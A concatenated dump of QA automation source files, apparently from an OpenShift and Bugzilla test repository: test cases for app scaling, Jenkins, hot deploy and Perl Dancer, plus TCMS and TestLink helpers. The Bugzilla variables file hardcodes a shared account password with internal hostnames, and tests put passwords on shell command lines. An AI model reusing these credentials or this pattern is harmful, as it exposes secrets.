self.steps_list.append(testcase.TestCaseStep(\n            \"Scale-down the application via Rest API\",\n            common.scale_down,\n            function_parameters = [ self.app_name,],\n            expect_description = \"The application must scale-down successfully\",\n            expect_return = 0,\n            try_interval=5,\n            try_count=6,\n            ))\n\n        self.steps_list.append(testcase.TestCaseStep(\n            \"Check MySql Result - again\",\n            self.check_mysql_result,\n            expect_description = \"Checking MySQL operation via web must be successful\",\n            expect_return = 0\n        ))\n\n        self.steps_list.append(testcase.TestCaseStep(\n            \"Remove mysql from %s\" % self.app_name,\n            common.embed,\n            function_parameters = [ self.app_name, \"remove-\" + common.cartridge_types[\"mysql\"] ],\n            expect_description = \"Removing mysql should pass\",\n            expect_return = 0\n        ))\n\n        case = testcase.TestCase(\"[US2006][Runtime][rhc-cartridge]Embed mysql to scalable apps: ruby\", self.steps_list)\n        case.run()\n        \n        if case.testcase_status == 'PASSED':\n            return self.passed(\"%s passed\" % self.__class__.__name__)\n        if case.testcase_status == 'FAILED':\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n        \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(RubyMysqlScaling)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n" }, { "alpha_fraction": 0.6180945038795471, "alphanum_fraction": 0.6293034553527832, "avg_line_length": 38.57142857142857, "blob_id": "f482338ad8e1461d74065fd2be63258372e08141", "content_id": "aeac1fb21e70e48d1dc41b24a786cab9b48b1fb6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4790, "license_type": "no_license", "max_line_length": 206, "num_lines": 122, "path": "/automation/open/testmodules/RT/cartridge/jenkins_client_auotmatically_removed.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nFeb 14, 2012\n\n[Runtime]Embedded jenkins 
client should be removed automatically after remove jenkins app\nhttps://tcms.engineering.redhat.com/case/136548/\n\"\"\"\n\nimport os\nimport sys\nimport shutil\nimport commands\nimport re\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[Runtime]Embedded jenkins client should be removed automatically after remove jenkins app\"\n try:\n test_name = self.config.test_variant\n except:\n self.info(\"Missing OPENSHIFT_test_name, using `python` as default\")\n test_name = 'python'\n\n self.app_type = common.app_types[test_name]\n self.app_name1 = 'my%s%s' % ( test_name, common.getRandomString() )\n self.app_name2 = 'my%s%s' % ( test_name, common.getRandomString() )\n self.steps= []\n self.jenkins_name = \"jenkins\"\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s %s\"%(self.app_name1, self.app_name2))\n common.destroy_app(self.jenkins_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True)\n\nclass JenkinsClientAutomaticallyRemoved(OpenShiftTest):\n def check_jenkins_client(self, app_name):\n (ret, output) = common.command_getstatusoutput(\"rhc app show %s -l %s -p '%s' %s\" % (app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS))\n if ret != 0:\n return False\n if re.search(r'jenkins-client', output) == None:\n return True\n else:\n return False\n\n def test_method(self):\n self.steps.append(testcase.TestCaseStep(\n 'Creating Jenkins app',\n common.create_app,\n function_parameters = [ self.jenkins_name, common.app_types['jenkins'], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, False ],\n expect_description = 'Jenkins app should be created successfully',\n expect_return = 0))\n\n for a in [ self.app_name1, self.app_name2 ]:\n self.steps.append(testcase.TestCaseStep(\n 'Creating application: %s' % ( a ),\n common.create_app,\n function_parameters=[a, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, False ],\n expect_description = 'The app should be created successfully',\n expect_return = 0))\n\n for a in [ self.app_name1, self.app_name2 ]:\n self.steps.append(testcase.TestCaseStep(\n 'Embedding Jenkins client to the application %s' % ( a ),\n common.embed,\n function_parameters = [ a, 'add-%s' % ( common.cartridge_types['jenkins'] ), self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd ],\n expect_description = 'Jenkins client cartridge should be embedded successfully',\n expect_return = 0,\n try_count=3,\n try_interval=5))\n\n self.steps.append(testcase.TestCaseStep(\n 'Deleting Jenkins app',\n \"rhc app delete %s -l %s -p '%s' --confirm %s\" \n % (self.jenkins_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'Jenkins app should be destroyed + jenkins client cartridge should be removed from applications',\n expect_return = 0))\n\n for app_name in [self.app_name1, self.app_name2]:\n self.steps.append(testcase.TestCaseStep(\n \"Check if jenkins client has been removed from app: %s\" % (app_name),\n self.check_jenkins_client,\n function_parameters = [app_name,],\n expect_description = \"Jenkins client shouldn't exist in the cartridges of app\",\n expect_return = True))\n\n\n case = testcase.TestCase(self.summary, self.steps)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % 
self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JenkinsClientAutomaticallyRemoved)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6951788663864136, "alphanum_fraction": 0.7013996839523315, "avg_line_length": 19.0625, "blob_id": "77b58ac4f3d8946754ca9e89c8ae172613e5b3b4", "content_id": "8acbc95bbcf65035d39169ed152edffcdb52744d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 643, "license_type": "no_license", "max_line_length": 72, "num_lines": 32, "path": "/automation/Example/variables.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nVariable file for Bugzilla XML-RPC tests.\nInclude this variable file to your test suite file via Variables keyword\n or from command line with --variablefile/-V option.\n\nAuthor: Xin Gao <[email protected]>\n\"\"\"\n\n# OS\ntest_os = 'Fedora'\n\n\n# Web Browser\nBROWSER = 'Firefox'\n\n\n# Environments\nTEST_ENV = 'https://bzweb01-qe.app.eng.rdu.redhat.com'\nDEV_ENV = 'https://bzweb01-devel.app.eng.rdu.redhat.com'\nSTAGE_ENV = 'https://partner-bugzilla.redhat.com'\n\nEXECUTE_ENV= TEST_ENV\n\n\n\n# Login\nPASSWORD = 'redhat'\nSUPER_ACCOUNT = '[email protected]'\nADMIN_ACCOUNT = '[email protected]'\nREDHAT_ACCOUNT = '[email protected]'\nUNPRIVILEGED_ACCOUNT = '[email protected]'\nDISABLED_ACCOUNT = '[email protected]'\n\n" }, { "alpha_fraction": 0.5471421480178833, "alphanum_fraction": 0.5652173757553101, "avg_line_length": 25.921052932739258, "blob_id": "8b4ba5df8abc92accb14a22af4b700e695b5543c", "content_id": "75acc8b0d1959057f91566df39f049113924201e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2047, "license_type": "no_license", "max_line_length": 69, "num_lines": 76, "path": "/automation/open/bin/refresh_testrun_by_tag.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n'''\n File name: refresh_testrun_by_tag.py\n Date: 2012/06/08 11:43\n Author: [email protected]\n\n Only CONFIRMED & Auto testcases will be fetched with given TAG\n'''\nimport sys\nimport re\nimport os\nfile_path = os.path.dirname(os.path.realpath(__file__))\nlib_path = os.path.abspath(file_path + \"/../lib\")\nsys.path.append(lib_path)\nfrom tcms import TCMS\n\ndef main():\n if (len(sys.argv)<3):\n print \"ERROR: Usage python %s <TESTRUN_ID> <TAG>\"%sys.argv[0]\n sys.exit(2)\n\n sys.argv.pop(0)\n testrun_id = sys.argv.pop(0)\n tcmsobj = TCMS()\n #1. get current list of testcases...\n all_tcs = {}\n new_tcs = {}\n for tc in tcmsobj.server.TestRun.get_test_cases(testrun_id):\n all_tcs[tc['case_id']]=1\n\n for tag in sys.argv:\n print 'Appending tag: ', tag\n\n #2. get all automated+confirmed testcases per tag\n f = {'plan':4962, \n 'case_status':2, #confirmed\n 'is_automated': 1,\n 'tag__name': tag}\n testcases_by_tag = tcmsobj.server.TestCase.filter(f)\n\n #3. prepare list of testcases...\n for tc in testcases_by_tag:\n if all_tcs.has_key(tc['case_id']):\n all_tcs[tc['case_id']]='OK'\n else: #new one\n new_tcs[tc['case_id']]=2\n\n #4. 
remove all==1\n to_remove = []\n for tc in all_tcs.keys():\n if all_tcs[tc] == 1: #to remove\n to_remove.append(tc)\n del all_tcs[tc]\n elif all_tcs[tc] == 'OK': #skip existing\n del all_tcs[tc]\n\n if len(to_remove)>0:\n print \"Removing %s testcases...\"%len(to_remove)\n tcmsobj.server.TestRun.remove_cases(testrun_id, to_remove)\n\n #5. add them all to the given testrun\n try:\n print \"Appending %s new testcases...\"%len(new_tcs.keys())\n tcmsobj.server.TestRun.add_cases(testrun_id, new_tcs.keys())\n except Exception as e:\n print 'ERROR:', str(e)\n return 254\n\n return 0\n\n\nif __name__ == \"__main__\":\n main()\n\n# end of reset_testrun.py \n" }, { "alpha_fraction": 0.6240310072898865, "alphanum_fraction": 0.6279069781303406, "avg_line_length": 24.799999237060547, "blob_id": "a7b76273bf591c1496b587fdbce67d4952e478d0", "content_id": "38054cc7a575ce2577a465560f8f57967b2b259d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 258, "license_type": "no_license", "max_line_length": 52, "num_lines": 10, "path": "/automation/listenertest/PleaseWait.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import tkMessageBox\nfrom Tkinter import Tk\n \n \nROBOT_LISTENER_API_VERSION = 2\n \ndef start_test(name, attributes):\n Tk().withdraw() # Remove root window\n tkMessageBox.showinfo(\"Please click 'OK'...\",\n \"Test Case Name: \" + name)\n" }, { "alpha_fraction": 0.5712057948112488, "alphanum_fraction": 0.5810810923576355, "avg_line_length": 31.610170364379883, "blob_id": "afc8b65dd7e7adaab9d9107c5489c3d71d2dfba2", "content_id": "7e8016adf8538cfadc43fc4c609729886f3ea17a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1924, "license_type": "no_license", "max_line_length": 184, "num_lines": 59, "path": "/automation/open/testmodules/RT/hot_deploy/ruby18_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nAug 28, 2012\n\n\n\"\"\"\nimport rhtest\nimport common\nfrom hot_deploy_test import HotDeployTest\nimport fileinput\nimport re\n\nclass Ruby18HotDeployWithoutJenkins(HotDeployTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_name = common.getRandomString()\n self.config.application_type = common.app_types['ruby']\n self.config.scalable = False\n self.config.jenkins_is_needed = False\n self.config.summary = \"[US2443]Hot deployment support for application - without Jenkins - ruby-1.8\"\n \n def configuration(self):\n self.log_info(\"Creating the application to check PID\")\n self.config.file_name = \"pid\"\n self.info(\"Editing file '%s'...\" % 'config.ru')\n try:\n for line in fileinput.input(\"./%s/config.ru\" % ( self.config.application_name ), inplace = True):\n if re.search(r'map.+health.+do', line):\n print \"map '/pid' do\"\n print \" pidcheck = proc do |env|\"\n print \" [ 200, { 'Content-Type' => 'text/plain'}, [File.open(ENV['OPENSHIFT_HOMEDIR'] + '/%s/run/httpd.pid').readline().chomp()]]\" % self.config.application_type\n print \" end\"\n print \" run pidcheck\"\n print \"end\"\n print\n print line,\n except Exception as e:\n fileinput.close()\n print type(e)\n print e.args\n self.fail(\"Configuration of the test-application must be successful\")\n finally:\n fileinput.close()\n self.deploy()\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n 
suite.add_test(Ruby18HotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6385390162467957, "alphanum_fraction": 0.6442065238952637, "avg_line_length": 35.09090805053711, "blob_id": "b78405cff3dd9f3b984bd4ca58a456bb24d58537", "content_id": "431c364bb0d7c50a7643bea0887ca78cbd6f5792", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1588, "license_type": "no_license", "max_line_length": 144, "num_lines": 44, "path": "/automation/robot_to_testlink/TestlinkAPIClient.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport xmlrpclib\nfrom time import strftime\n\nclass TestlinkAPIClient:\n # substitute your server URL Here\n SERVER_URL = \"http://yourdomain/testlink/lib/api/xmlrpc.php\"\n\n def __init__(self, devKey, testplanID, buildNotes):\n self.server = xmlrpclib.Server(self.SERVER_URL)\n self.devKey = devKey\n self.testplanID = testplanID\n self.buildNotes = buildNotes\n buildName = strftime(\"%Y-%m-%d_%H%M%S\")\n self.buildName = buildName\n\n def reportTCResult(self, tcid, buildid, status, testRunNotes):\n data = {\"devKey\":self.devKey, \"testcaseid\":tcid, \"testplanid\":self.testplanID, \"buildid\":buildid, \"status\":status, \"notes\":testRunNotes}\n return self.server.tl.reportTCResult(data)\n\n def getInfo(self):\n return self.server.tl.about()\n\n def createBuild(self):\n data = {\"devKey\":self.devKey, \"testplanid\":self.testplanID, \"buildname\":self.buildName, \"buildnotes\":self.buildNotes}\n print \"Build Name %s created\" % data[\"buildname\"]\n x = self.server.tl.createBuild(data)\n out = x[0]\n buildID = out['id']\n print \"Build ID is %s\" % buildID\n return (buildID)\n\n def getTestCaseIDFromTestName(self, testcaseName):\n x1 = testcaseName.split(\"-\")\n x2 = x1[0]\n x3 = x2.split(\"_\")\n testcaseID = x3[1]\n return (testcaseID)\n\n def existingBuild(self):\n data = {\"devKey\":self.devKey, \"testplanid\":self.testplanID}\n existingBuild = self.server.tl.getLatestBuildForTestPlan(data)\n return existingBuild['id']\n" }, { "alpha_fraction": 0.6102257370948792, "alphanum_fraction": 0.6218459606170654, "avg_line_length": 34.845237731933594, "blob_id": "39900a3ca56a091595fe02909d2a0dc1601eb294", "content_id": "c71e02611dce911f0c362582e8fea73f0ab7187b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3012, "license_type": "no_license", "max_line_length": 108, "num_lines": 84, "path": "/automation/open/testmodules/RT/node/restart_libra_service.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJianlin Liu\[email protected]\nDec 30, 2011\n[rhc-node] All created applications will restart when restart libra service as root\nhttps://tcms.engineering.redhat.com/case/122333/?from_plan=4962\n\"\"\"\n\nimport sys\nimport os\n\nimport testcase, common, OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n ITEST=\"DEV\"\n def initialize(self):\n self.summary = \"[rhc-node] All created applications will restart when restart libra service as root\"\n self.libra_server = common.get_instance_ip()\n self.app_name = \"myapp\"\n self.app_type = common.app_types[\"php\"]\n self.steps_list = []\n common.env_setup()\n tcms_testcase_id=122333\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass RestartLibraServiceDevenv(OpenShiftTest):\n def test_method(self):\n testcase.TestCaseStep(\"Create an app\",\n 
common.create_app,\n function_parameters=[self.app_name, self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, False],\n expect_return=0).run()\n \n def get_pgrep_command():\n uuid = OSConf.get_app_uuid(self.app_name)\n return 'pgrep -u %s -P 1'%uuid\n\n self.info(\"Log into express server, get app's process ID\")\n (status, output) = common.run_remote_cmd_as_root(get_pgrep_command())\n self.assert_equal(status,0, \"SSH Command must be run successfully\")\n pid1=output\n self.assert_equal(status,0, \"SSH Command must be run successfully\")\n\n self.info(\"Log into express server, restart libra service\")\n (status, output) = common.run_remote_cmd_as_root('/etc/init.d/libra restart')\n self.assert_equal(status,0, \"SSH Command must be run successfully\")\n\n self.info(\"Log into express server, get app's process ID\")\n (status, output) = common.run_remote_cmd_as_root(get_pgrep_command()) \n self.assert_equal(status,0, \"SSH Command must be run successfully\")\n pid2=output\n\n\n testcase.TestCaseStep(\"Access app's URL to confirm it is running fine\",\n \"curl -H 'Pragma: no-cache' %s\",\n string_parameters = [OSConf.get_app_url_X(self.app_name)],\n expect_return=0,\n expect_string_list=[\"Welcome to OpenShift\"],\n expect_description=\"Access page successfully\").run()\n\n if pid1 == pid2:\n self.info(\"App's process id before and after restart libra service does not have any change.\")\n return self.failed(\"%s failed\" % self.__class__.__name__)\n else:\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RestartLibraServiceDevenv)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.7076700329780579, "alphanum_fraction": 0.7221418023109436, "avg_line_length": 24.592592239379883, "blob_id": "4720dd55fb8715a32350928c13846a44e83cc317", "content_id": "bae2052eba1d2c6f835a7aa63578609d6144ce32", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 691, "license_type": "no_license", "max_line_length": 111, "num_lines": 27, "path": "/automation/open/testmodules/RT/hot_deploy/php_scaling_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nSept 26, 2012\n\"\"\"\nimport rhtest\nimport common\nfrom php_without_jenkins import PHPHotDeployWithoutJenkins\n\nclass PHPScalingHotDeployWithoutJenkins(PHPHotDeployWithoutJenkins):\n def __init__(self, config):\n PHPHotDeployWithoutJenkins.__init__(self, config)\n self.config.scalable = True\n self.config.summary = \"[US2443] Hot deployment support for scaling application - php - without jenkins\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PHPScalingHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6180945038795471, "alphanum_fraction": 0.6293034553527832, "avg_line_length": 24.489795684814453, "blob_id": "3cfac37221b32b603ef6524e670db011ee1a69c6", "content_id": "adc503d8eaaa5e58cf76178a59fdc1c655af8f95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1249, "license_type": "no_license", "max_line_length": 91, "num_lines": 49, "path": 
"/automation/open/testmodules/UI/Demo01.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nDemo for UI autotesting\n\"\"\"\nimport rhtest\nimport common \n\nclass OpenShiftTest(rhtest.Test): \n INTERACTIVE = False\n\n def initialize(self):\n self.domain_name = common.get_domain_name()\n self.new_domain = common.getRandomString(10)\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass Demo01(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n #1 create an domain via REST\n self.info(\"Altering domain to %s\"%self.new_domain)\n (status, rest) = self.config.rest_api.domain_update(self.new_domain)\n self.assert_equal('OK', status, 'Unable to alter domain to %s'%self.new_domain)\n\n #2. let's check the domain via UI\n web.go_to_home()\n web.go_to_signin()\n web.login()\n web.go_to_account()\n web.assert_text_equal_by_xpath(self.new_domain, \n '''id('content')/div/div/div/div[2]/div/div/div[1]/section[2]/div[1]/strong''')\n\n return self.passed(\"UI Demo01 test passed.\")\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Demo01)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6590909361839294, "alphanum_fraction": 0.6590909361839294, "avg_line_length": 10, "blob_id": "8ccf9def9f42c5447817826567264f2b2b79db46", "content_id": "eeca0081ea889f59bbfc6721ae4fcd542a10f306", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 44, "license_type": "no_license", "max_line_length": 15, "num_lines": 4, "path": "/automation/open/Longevity/delete_all.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n. ./function.sh\n\napp_delete_all\n" }, { "alpha_fraction": 0.6053943634033203, "alphanum_fraction": 0.6194469332695007, "avg_line_length": 43.55555725097656, "blob_id": "89df0a40b6fc5dd1d410da6f0b7969982536332a", "content_id": "7a0084f3a10a8cc7ad9d71a8a46bfc381744f9b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4412, "license_type": "no_license", "max_line_length": 593, "num_lines": 99, "path": "/automation/open/testmodules/RT/cartridge/perl_dancer_application.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[US478][rhc-cartridge]Perl cartridge: Perl Dancer application\nhttps://tcms.engineering.redhat.com/case/122403/\n\"\"\"\nimport os,sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport testcase,common,OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US478][rhc-cartridge]Perl cartridge: Perl Dancer application\"\n self.app_name = \"dancer\"\n self.app_type = common.app_types[\"perl\"]\n self.git_repo = os.path.abspath(os.curdir)+os.sep+self.app_name\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass PerlDancerApplication(OpenShiftTest):\n def test_method(self):\n\n # 1.Create an app\n self.steps_list.append( testcase.TestCaseStep(\"1. 
Create an perl app\",\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # 2.Setup perl config(No check)\n cmd = \"mkdir -p /usr/share/perl5/CPAN/ ; rm -f /usr/share/perl5/CPAN/Config.pm ; cp %s/app_template/Config.pm /usr/share/perl5/CPAN/Config.pm ; rm -rf /$HOME/.cpan\" % (WORK_DIR)\n self.steps_list.append( testcase.TestCaseStep(\"2.Setup perl config(No check)\",\n cmd,\n expect_description=\"Successfully setup perl config\"))\n\n # 3.Install dancer and dependencies from CPAN\n cmd = \"cd %s/app_template && tar xzf local-lib-1.008004.tar.gz && cd local-lib-1.008004 && perl Makefile.PL --bootstrap=~/dancerlocalperl && make install && echo 'eval $(perl -I$HOME/dancerlocalperl/lib/perl5 -Mlocal::lib=$HOME/dancerlocalperl)' >>~/localperlshell && source ~/localperlshell && export PERL_MM_USE_DEFAULT=1 && cpan YAML Dancer Plack::Handler::Apache2 && cd %s && dancer -a myapp && git rm -r perl && ln -s myapp/public perl && cd libs && ln -s ../myapp/lib/myapp.pm . && cd .. && echo 'YAML\\nDancer\\nPlack::Handler::Apache2' >> deplist.txt\" % (WORK_DIR, self.git_repo)\n self.steps_list.append( testcase.TestCaseStep(\"3.Install dancer and dependencies from CPAN\",\n cmd,\n expect_description=\"dancer should be installed successfully\",\n expect_return=0))\n\n # 4.Create the index.pl\n cmd = \"cd %s/perl && cp dispatch.cgi index.pl && sed -i -e 's/.*use FindBin.*//g' index.pl && sed -i -e \\\"12s/RealBin.*/ENV{'DOCUMENT_ROOT'}, '..', 'myapp', 'bin', 'app.pl');/g\\\" index.pl\" % (self.git_repo)\n self.steps_list.append( testcase.TestCaseStep(\"4.Create the index.pl\",\n cmd,\n expect_description=\"index.pl should be created\",\n expect_return=0))\n\n # 5. 
Git push all the changes\n self.steps_list.append( testcase.TestCaseStep(\"5.Git push all the changes\",\n \"cd %s && git add -A && git commit -a -m 'lets dance' && git push\" % (self.git_repo),\n expect_description=\"changes should be pushed to the git repo successfully\",\n expect_return=0))\n\n # 6.Check app via browser\n test_html = \"Perl is dancing\"\n self.steps_list.append( testcase.TestCaseStep(\"6.Check app via browser\",\n common.grep_web_page,\n function_parameters=[OSConf.get_app_url_X(self.app_name), test_html, \"-H 'Pragma: no-cache'\", 5, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PerlDancerApplication)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.7112375497817993, "alphanum_fraction": 0.7254623174667358, "avg_line_length": 24.10714340209961, "blob_id": "5fec41600ae5d9bd7964993c73d860fad54f2e5e", "content_id": "47983b0a3d11bb9247665ce20660d29cd638c487", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 703, "license_type": "no_license", "max_line_length": 119, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/jbosseap_scaling_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 6, 2012\n\"\"\"\n\nimport rhtest\nimport common\nfrom jbosseap_without_jenkins import EAPHotDeployWithoutJenkins\n\nclass EAPScalingHotDeployWithoutJenkins(EAPHotDeployWithoutJenkins):\n def __init__(self, config):\n EAPHotDeployWithoutJenkins.__init__(self, config)\n self.config.scalable = True\n self.config.summary = \"[US2443] Hot deployment support for scalable application - without Jenkins - jbossaeap6\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EAPScalingHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6645016074180603, "alphanum_fraction": 0.6698101162910461, "avg_line_length": 25.55223846435547, "blob_id": "41014627808acb8e776c0e74efed4e21287c29c4", "content_id": "c7785fc38be2bcf235c890c6b22d83189846405d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16012, "license_type": "no_license", "max_line_length": 120, "num_lines": 603, "path": "/automation/open/lib/supports/XML/XHTML.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# vim:ts=4:sw=4:softtabstop=0:smarttab\n# License: LGPL\n# Keith Dart <[email protected]>\n\"\"\"\nThis package actually implements the XHTML specification.\n\nThe XHTMLDocument class can be used to construct new XHTML documents.\nThere are many helper methods to construct a document from dtd objects.\n\n\"\"\"\n\nimport sys\nimport re, HTMLParser\nfrom htmlentitydefs import entitydefs\nfrom textutils import 
identifier\n\nTRUE = Enum(1, \"true\")\nFALSE = Enum(0, \"false\")\n\nimport POM\n\nSTRICT = \"strict\"\nTRANSITIONAL = \"transitional\"\nFRAMESET = \"frameset\"\nDOCTYPES = {}\nDOCTYPES[STRICT] = \"\"\"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"xhtml1-strict.dtd\">\"\"\"\nDOCTYPES[TRANSITIONAL] = \"\"\"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"xhtml1-transitional.dtd\">\"\"\"\nDOCTYPES[FRAMESET] = \"\"\"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD XHTML 1.0 Frameset//EN\" \"xhtml1-frameset.dtd\">\"\"\"\n\nNAMESPACE = \"http://www.w3.org/1999/xhtml\"\n\n# tags known to be inline - use for BeautifulWriter and other type checks\nINLINE_SPECIAL = [\"span\", \"bdo\", \"object\", \"img\", \"map\"]\n# (br is ommitted on purpose - looks better)\nINLINE_FONTSTYLE = [ \"tt\", \"i\", \"b\", \"big\", \"small\"]\nINLINE_PHRASE = [ \"em\", \"strong\", \"dfn\", \"code\", \"samp\", \"kbd\",\n\t\"cite\", \"var\", \"abbr\", \"acronym\", \"q\", \"sub\", \"sup\"]\nINLINE_FORM = [\"input\", \"select\", \"textarea\", \"label\", \"button\"]\nINLINE = [\"a\"] + INLINE_SPECIAL + INLINE_FONTSTYLE + INLINE_PHRASE + INLINE_FORM \n\ndef get_dtd_module(doctype):\n\tmodname = \"xhtml1_%s\" % (doctype)\n\tfullname = \"dtds.%s\" % (modname)\n\ttry:\n\t\treturn sys.modules[fullname]\n\texcept KeyError:\n\t\tpass\n\tpkg = __import__(fullname)\n\tmod = getattr(pkg, modname)\n\tsys.modules[fullname] = mod\n\tsetattr(sys.modules[__name__], modname, mod)\n\treturn mod\n\n# make strings into Text objects, otherwise verify Element object.\ndef check_object(obj):\n\tif type(obj) in (str, unicode):\n\t\treturn POM.Text(obj)\n\tif isinstance(obj, POM.ElementNode):\n\t\treturn obj\n\traise ValidationError, \"bad initializer object: should be string or ElementNode 